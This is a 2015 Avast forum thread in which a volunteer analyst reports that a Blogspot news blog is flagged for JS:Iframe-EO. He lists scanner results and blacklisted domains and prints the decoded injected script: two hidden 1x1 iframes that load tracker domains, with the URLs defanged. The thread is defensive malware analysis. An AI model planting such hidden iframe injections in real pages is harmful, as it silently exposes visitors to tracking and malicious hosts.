JS:Iframe-EO [Trj] detected on this website?

Avast WEBforum »
Other »
Viruses and worms (Moderators: Maxx_original, misak) »
JS:Iframe-EO [Trj] detected on this website?

« previous next »

Print

Pages: [1] Go Down

Author Topic: JS:Iframe-EO [Trj] detected on this website? (Read 1303 times)

0 Members and 1 Guest are viewing this topic.

polonus

Avast Überevangelist
Probably Bot
Posts: 33940
malware fighter

JS:Iframe-EO [Trj] detected on this website?

« on: August 07, 2015, 08:37:34 PM »

See: https://www.virustotal.com/nl/file/bd6c938a688d98e7e0f4fae318abc90a2cb2571991bd90c02018e3d9b82a2097/analysis/
5 malicious files detected: http://quttera.com/detailed_report/www.beatrice-borromeo-news.blogspot.com
Severity:   Malicious
Reason:   Detected reference to blacklisted domain
Details:   Detected reference to malicious blacklisted domain -www.beatrice-borromeo-news.blogspot.de.
-japanesenostalgiccar.com
List of referenced blacklisted domains/hosts: 3
-www.beatrice-borromeo-news.blogspot.de
-japanesenostalgiccar.com
-beatrice-borromeo-news.blogspot.com
Yandex blacklisted site: https://yandex.com/infected?l10n=en&url=www.beatrice-borromeo-news.blogspot.com&redircnt=1438971898.1
74 thrteats on site detected.
Decoded javascript flagged

 Decoded javascript:


<iframe src="htxp://lostwebtracker.com/? * if=1&scr_w=undefined&scr_h=undefined&blog=http%3A//example.com&ref=undefined&l=cars" height="1" width="1"></iframe><iframe src="htxp://green-tracker.com/? **
if=1&scr_w=undefined&scr_h=undefined&blog=http%3A//example.com&ref=undefined&l=cars" height="1" width="1"></iframe>

* https://www.mywot.com/en/scorecard/lostwebtracker.com?utm_source=addon&utm_content=popup
Found to be suspicious: http://www.google.com/safebrowsing/diagnostic?site=lostwebtracker.com
** Not available: http://toolbar.netcraft.com/site_report?url=http://green-tracker.com
invalid domain name. bad zone: Could not get name servers for '-sk.s5.bns1.ns113.searchreinvented.com'.
Bad website -> https://www.mywot.com/en/scorecard/searchreinvented.com?utm_source=addon&utm_content=rw-viewsc
http://hosts-file.net/default.asp?s=searchreinvented.com IP resolution failed: http://hosts-file.net/?s=searchreinvented.com&view=history

Consider results: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.beatrice-borromeo-news.blogspot.com

polonus (volunteer website security analyst and website error-hunter)

Logged

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Pondus

Probably Bot
Posts: 37627
Not a avast user

Re: JS:Iframe-EO [Trj] detected on this website?

« Reply #1 on: August 07, 2015, 09:12:13 PM »

9 months later 35/55
https://www.virustotal.com/nb/file/edac8861985a988f289f770df778544258f12932037f6318582cae8f3c465a17/analysis/1438974560/

and some big vendors still dont detect

Logged

Print

Pages: [1] Go Up

« previous next »

Avast WEBforum »
Other »
Viruses and worms (Moderators: Maxx_original, misak) »
JS:Iframe-EO [Trj] detected on this website?

SMF 2.0.18 | SMF © 2015, Simple Machines
XHTML
RSS
WAP2

Page created in 0.064 seconds with 21 queries.